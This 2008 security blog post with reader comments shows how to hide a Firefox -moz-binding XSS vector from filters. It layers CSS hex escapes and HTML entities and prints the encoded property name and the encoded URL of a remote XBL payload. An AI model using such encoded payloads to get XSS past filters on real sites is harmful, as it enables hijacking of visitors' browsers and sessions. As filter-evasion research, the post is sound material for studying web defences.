Moz-binding XSS fun

Monday, 4 February 2008

CSS supports hex encoding within styles as well html entities, but did you know you could combine them both? I didn’t. To construct an attack similar to the one displayed below you first need to convert your CSS property to hex, so -moz-binding becomes: \2d\6d\6f\7a\2d\62\69\6e\64\69\6e\67, notice there is no “x” prefix or double zeros like you would see in HTML entities or Unicode Javascript. The link contains a Hackvertor URL to help you with the conversion.

You can do the same conversion on the value of the property, so the url of the moz-binding payload: //businessinfo.co.uk/labs/xbl/xbl.xml#xss becomes : \2f\2f\62\75\73\69\6e\65\73\73\69\6e\66\6f\2e\63\6f\2e\75\6b\2f\6c\61\62
\73\2f\78\62\6c\2f\78\62\6c\2e\78\6d\6c\23\78\73\73

I hope you’re following so far, we can now take the property string and encode it further, crazy eh? Any part of the property can now be encoded with html entities. I went for the backslash and malformed entities but you can experiment with different combinations. The property “\2d\6d\6f\7a\2d\62\69\6e\64\69\6e\67” now becomes: &#x5c2d&#x5c6d&#x5c6f&#x5c7a&#x5c2d&#x5c62&#x5c69&
#x5c6e&#x5c64&#x5c69&#x5c6e&#x5c67.

Here is the final vector with a link to hackvertor for testing:-
The final vector

The entry 'Moz-binding XSS fun' was posted on February 4th, 2008 at 10:31 am and is filed under Cascading Style Sheets, Security, xss. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.

6 Responses to “Moz-binding XSS fun”

  1. pdp writes:
    No. 1 — February 4th, 2008 at 2:55 pm

    interesting, I quickly checked the method in Firefox 3 and it doesn’t seem to work. I haven’t checked it in Firefox 2 though.

  2. Gareth Heyes writes:
    No. 2 — February 4th, 2008 at 3:21 pm

    Yep only tested in Firefox 2, although other tricks may be possible with FF3, I might have a go at that some other time 🙂

  3. Gareth Heyes writes:
    No. 3 — February 4th, 2008 at 3:24 pm

    Another thing I forgot to mention is that noscript silently disables moz-binding, so you have to disable noscript to test the vector.

  4. riahmatic writes:
    No. 4 — February 5th, 2008 at 4:07 am

    error console in FF3:
    Warning: Unknown property ‘尭屭屯屺尭屢屩屮層屩屮屧’. Declaration dropped.

    Though I think FF3 enforces SOP on -moz-binding now anyway, right?

  5. Gareth Heyes writes:
    No. 5 — February 5th, 2008 at 9:26 am

    @riahmatic

    Yep that’s the expected behavior but FF2 seems to read the entities first and decode them but for some reason only takes into account the first few characters (maybe because it’s in a style).

    I’ve not looked at FF3 yet much but I’m sure to have plenty of fun when I do 🙂 If FF3 does enforce SOP on moz-binding then that’s a good thing but I’ve not seen it mentioned anywhere.

  6. Vinicius K-Max writes:
    No. 6 — February 6th, 2008 at 1:57 am

    awesome! 🙂

«
»